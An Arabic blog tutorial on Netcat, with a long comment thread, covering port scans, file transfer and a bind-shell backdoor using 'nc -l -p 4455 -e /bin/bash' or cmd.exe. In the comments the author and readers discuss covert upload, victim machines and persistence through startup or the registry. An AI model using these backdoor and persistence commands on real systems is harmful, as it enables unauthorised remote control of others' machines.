شرح أداة Netcat – The Swiss Army Knife
كتب بتاريخ: Jan 22nd, 2008 | بواسطة: عبدالمهيمن
السلام عليكم ورحمة الله وبركاته
Netcat من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
وهي بالمرتبة الرابعة في قائمة Top 100 Network Security Tools
استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها
فحص المنافذ المفتوحة في السيرفر
تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
أفضل وأسرع منها في ذلك << سأضع شرح لها قريبا ان شاء الله, وللقيام
بهذه العملية نستعمل الأمر
nc -v -w1 SERVER-IP -z FromPort-ToPortأما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ
مثال على ذلك
nc -v -w1 64.233.183.147 -z 1-100ولفحص أكثر من نطاق منافذ نستعمل الأمر
nc -v -w1 -z 64.233.183.147 -z 1-100 400-500ملاحظة: 64.233.183.147 هو IP موقع Google
نقل الملفات بين جهازك والسيرفر
من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل
nc SERVER-IP PORT < FILEونطبق الأمر في الجهاز المستقبل
nc -l -p PORT > FILEمثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا
nc 192.168.0.45 5555 < data.txtأما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر
nc -l -p 5555 > data.txtجعل الـ Netcat تعمل كـ Backdoor
هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر
nc -l -p PORT -e PROGRAMمع اضافة -d و -L في ويندوز ليصبح الأمر
nc -l -p PORT -d -e PROGRAM -Lمثال على هذه الخاصية نقوم بتطبيق الأمر
nc -l -p 4455 -e /bin/bashعلى السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل
nc -l -p 4455 -e -d cmd.exe -Lوللاتصال بالسيرفر نطبق الأمر
nc -v -n SERVER-IP 4455وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر
nc -hتحميل أداة Netcat لنظام لينوكس | تحميل أداة Netcat لنظام ويندوز
ان أصبت فمن الله وان أخطأت فمن نفسي ومن الشيطان
أرجو أن ينال الشرح اعجابكم
تحياتي Br4v3-H34r7.
فعلاً اداة النت كات جبارة وهي تختصر الكثير من الوقت
يعطيك العافية على الموضوع واستمر بارك الله فيك
يا هلا فيك أخوي طارق الله يعافيك
وماشاء الله عليك دائما منور المدونة
شكرا لك
موقعك بدون اي مجامله في غاية الروعه
واصل يابطل
وربي يوفقك دنيا واخره
مشكور يا جميل وانة استخدمة للنيت ورك حيث يقزم بسجب الماكات شكرا ليك باي
بصراحة الأداة ممتازة بس ماينفعش تستخدم باكدور لأن علشان نستخدمها لازم الضحية يفعلها وبالتالى صعب اقوله تعالى علشان اخترق جهازك !!!!!!!!!
واشكرك على المدونة ممتازة
@محمد: العفو وان شاء الله تكون استفدت
@NsA: شكرا أخوي على كلامك الجميل وعلى الدعوات الأجمل وان شاء الله يوفقنا أجمعين
@thrkam: ان شاء الله يكون عجبك الموضوع وهلا فيك في المدونة
@CASATAWY: طبعا أنت مش حتخترق فيها جهاز! هذا شغل أطفال وفي برامج أفضل لهذه المهمة لكن netcat ممكن تستخدم في اختراق السيرفرات والحصول على Shell ويمكن استخدامها في اختراق الأجهزة أيضا اذا استعنا بملف bat ينفذ الأوامر وبرمجنا برنامج بالفيجول بيزك مثلا يدمج الملفين وسابقا شرحت الطريقة كاملة بالفيديو ولكن قبل ما أفتح المدونة.. ممكن أرجع أعيد الشرح وأكتب عنه موضوع جديد قريبا.. دمت بود
والله اخي ما ارعف كيف اجازيك بس استمر جزاك الله الف خير واي شي تحتاجه ان شاء الله احنا موجودين بس ما اعتقد انت تحتاج شي يااستاذ
أخي learn&learn لاداعي لكملة “استاذ” فماحدا استاذ هنا وماحدا ولد كذلك شكرا على عرضك واذا لزمني شيء بيوم من الأيام سأخبرك
برنامج النت كت مش عارف احمله ممكن شرح التحميل منين وشكرا
عندي سؤال و هو كيف أرفع له nc من دون أن يحس مع تشغيلها في الخلفية .
@anonymous: بصراحة أخي لم أفهم سؤلك لأنه غير واضح! تريد أن ترفع Netcat لأين؟ سيرفر؟ وتشغلها دون أن يشعر بها الـ root؟ ستحتاج لاستغلال ثغرة remote لتقوم بكل ذلك وتفتح منفذ في السيرفر ثم تستخدم الـ Netcat للاتصال بالمنفذ وليس رفعها للسيرفر! وطبعا لا أضمن عدم شعور الأدمن
جميل يا عبده
طبعا أكثر الناس مايعرفون غير
nc -v -l -p 80
شرح جميل منك أخي و فعلا اداة netcat رائعة و اتبتت فاعليتها في مجال ال Hacker
و هناك تطوير للاداة باسم cryptcat و الذي يتميز بخاصية التشفير .
تحياتي لك أخي .
@KING SABRI: أنت أجمل أخي صبري و ان شاء الله تكون استفدت من الشرح
@unary: ردك أجمل أخي.. أداة netcat من أقوى الأدوات و أغلبنا يتعامل معها حتى الآن خصوصا أن استخداماتها متعددة جدا و تفيدنا بكثير من الأمور, بالنسبة لـ cryptcat أتذكر أني سمعت بها أو بشيء مماثل لكني لم أجربها بصراحة فاستخدام VPN يفي بالغرض
وعليكم السلام
اخوي فعلاً الاداه جميله لكن صعوبتها في الاوامر
لنفرض مثلن اني اخترق جهاز واحد عن طريق الشل كود
وقدرت ادخل جهازه بس عندي مشكله وهي كيف ارفع مثلاً باتش لجهاز الضحيه
وكيف استطيع اخذ ملف من جهازي الضحيه الي جهازي
واخير مثلن ابي اسحب باتش من النت لحهازي الضحيه
ياليت تقولي الاوامر !
ومعليش اذا طولت
أهلا أخي خالد.. لا أجد أي صعوبة بالتعامل مع الأداة و على العكس تماما أوامرها سهلة مقارنة مع غيرها من الأدوات.. بالنسبة لأسئلتك فهي تعتمد على عدة أشياء مثل نظام التشغيل, الاستغلال المستخدم, الصلاحيات و غيرها من الأمور.. استخدامات النت كات موضحة في الموضوع أنصحك بقرائته!
اخوي الغالي اولن مشكور علي هذا البرنامج و الله ما قصرت يا بعد عيني بس عندي سوئل
1- حبي النظام الباك تراك 3 الفاينل يحتوي علي هذا الادات هي نفس عمل هذا الادات الموجود اهني ام يختلف عمل تلك الادات عن هذة ارجو ان فتهمت قصدي و مشكور مرة اخري الغالي علي هذا البرنامج و ان شاء الله نحو الامام و التقدم و تحياتي اليك و الي الجميع
أخي أجل الأداة هي نفسها الموجودة في توزيعة الباك تراك و حسب معرفتي يوجد أداة netcat واحدة لكن تختلف الاصدارات…
أهلا أخي خالد.. لا أجد أي صعوبة بالتعامل مع الأداة و على العكس تماما أوامرها سهلة مقارنة مع غيرها من الأدوات.. بالنسبة لأسئلتك فهي تعتمد على عدة أشياء مثل نظام التشغيل, الاستغلال المستخدم, الصلاحيات و غيرها من الأمور.. استخدامات النت كات موضحة في الموضوع أنصحك بقرائته!
مشكور علي الرد
تفضل اخوي
نظام التشغيل وندوز الاستغلال عن طريق الشل كود الصلاحيات لا اعلم كيف اطلعها
اذا ماعرفت وش الامر الصحيح
ياليت تضع جميع اوامر النت كات لرفع ملف بجميع الصلاحيات
أخي لاظهار جميع أوامر النت كات استخدم آخر أمر مذكور في الشرح! و الأوامر السابقة تشرح بعض استخدامات النت كات. يعني الأوامر أمامك و أنت تقلي أضعها لك,, شيء غريب!!
جمييييل ،، يآبطل ،، اداه جميله من شخص ارووووع ،،
تحيآتي لك
السلام عليك أخي .. أنا عندي البرنامج .. ولكن لا أعرف أين بالضبط يتم تنفيذ هذه الأوامر التي كتبتها .. حيث أنه لا يوجد خانه لكتابة هذه الأوامر .. اعذرني لجهلي.. ولكن إذا كان فيها تعب ممكن شرح مدعم بالصور لهذه الأوامر .. .. اسف للإطالة ولو الشرح موجود مسبقاً يا ريت تنوه بالإشارة لإسم الموضوع لأبحث عنه.. جزاك الله كل خير … ويا ريت لو يكون في شرح عن الشبكات وأوامر الشبكات .. عاوزين نتعلم حاجة مفيدة بقى
How To make it run as a service With windows Machine ?!!
I mean It run after restart The computer ?!!
@SaUdi~Net: تسلم أخي.. ان شاء الله يكون الموضوع نال اعجابك وأهلا بك في المدونة.
@عبد الحميد: وعليكم السلام.. أخي الشرح واضح جدا ولايحتاج لصور لتتعلم كيفية تطبيقه!! كل ماعليك هو تنفيذ هذه الأوامر من الـ cmd اذا كان نظامك Windows مع مراعاة تنفيذ الأمر في نفس مجلد البرنامج أو نسخ الأداة لمجلد system32 الموجود داخل النظام.. تحياتي!
@Offensive: There is a different between run the program as windows service or make it run when windows startup! anyway you can use .bat file and add it to the startup folder or to the registry. please use Arabic language next time!!
الله يوفقك دنيا واخره
والله افضل مدونه رايتهاااااااااااا
السلام عليكم ورحمة الله وبركاته
اولا شكرا اخي على الشرح الوافي والتام
بس عندي سؤال انا حملت الادات تبع الوينداوز ثم وضعتها بsystem32 وعملت امر cmd بس لما اجي اطبق امر nc ياتيني الرد التالي
Access is denied.
رجاءا شرح لكيفية تنزبلها على الجهاز ثم تنصيبها ثم الاتصال اذا انا فاهم استعمالها خطا
وربي يجازيك كل خير
@knari: شكرا أخي على دعواتك الجميلة.. أتمنى أن تكون استفدت من الموضوع وأهلا بك في المدونة.
@DrEaDFuL: وعليكم السلام أخي.. لا تحتاج لتنصيب الأداة ويمكنك استخدامها بشكل مباشر من cmd بعد وجودك بنفس مسار الأداة دون الحاجة لنسخها لمجلد system32 وبالنسبة لرسالة Access is denied لا أعلم ما السبب بصراحة لكن أظن أنك تعمل على النظام بحساب user وليس Administrator! بالتوفيق…
تسلم حبيب قلبي
في إنتظار الشرح
انا اليوم بعد ما تعبت في الهاكينج و البحث عرفت المدونه دي بس الحمد لله اني عرفتها اصلا و مشكور اخي
السلام عليكم
بعد اكمال الاطلاع والتنفيذ
شكرا جزيلا اخي العزيز على الشرح..انت فعلا ساعدتني بفهم البرنامج
وان شاء الله ححاول اكون مفيدة واضيف استخدام اخر
وفقك ربي
تسلم والله على الدرس الجميل الاكثر من رائع
شـكــ وبارك الله فيك ـــرا لك … لك مني أجمل تحية .
السسلام عليكم
اخي عبد المهيمـن ، انا جربت متـل ما قلـت بالششرح لكـن طلع لـى هاد المسسج !!!
inverse host lookup failed: h_errno 11004: NO_DATA
وهآذ
(UNKNOWN) [Ip server] 97 (?): TIMEDOUT
يعني 97 هـو البورت !!
انتظر الاجابـه
تحيآتـى
@HaCk-dz: رسالة inverse host lookup failed تعني وجود مشكلة بالـ DNS الرسالة التالية تعني عدم تمكن الأداة من الاتصال مع الـ IP الذي حددته عن طريق المنفذ 97.
مشكور اخوي القدير عبد المهمين وان وما شاء الله مدونة احلى من اي مدونة اخرى اشكرك على فتخها واستفادة الجميع منها وشكرا على الشرح
بارك الله فيك اخي
شرح رائع ومواضيعك في القمة
واصل بدون فواصل
كفوو والله يا ابن البلد
مشكور حبيبي عبدالمهيمن
مدونة رائعه والله
السلام عليكم
شرح ممتاز لكن ناقصه شيئ وهو الاتصال بالسرفر وتخطي المشاكل
انا لدي مشاكل عندما اتصل
لا استطيع تضهر فقط TIMEDOUT او OPEN و فقط
عاشو على هذا الشرح >>>>>>>>>>>>العراقي
غريب و الله
انا منزمان ما شفت شرح رائع متل هالشرح
مشكور أخ بريف
و انشالله نشوف المزيدمن ابداعاتك
^_^
مشكور اخوي على الشرح الوافي
اجعلو شعاركم لا للبرايفت
انت راجل باشا و رئيس قسم, بجد حاولت افهم من مواقع اجنبيه وعربية بس اللى فهمنى مقالك ده, مع انك كاتبو من سنتين بس شوف العمل الطيب بيقعد للشخص و الدعوة انشالله تكون وصلتلك يا جميل
انا اخ محمد الحارسي فيى العراق صديقك اريد ان اكون صديقك ولدي كثي لاقول لك وانشاءالله سيستفيد كلنا من الاخر مع تحياتي لك
اشكرك حبيبي عبد المهيمن ووفقك الله لما يحبه ويرضاة ننتضر المزيد
شرح صافي وافي
ربي يجازيك خويا لعزيز ….. افضل المدونات لي زرتها بحياتي شكرا اخي
لو تتفضل و تساهم في رفع مستوى اخوانك بوضع موضوع عن اختراق جهاز مجهول على الشبكة بشكل مباشر ……..كل التوفيق خي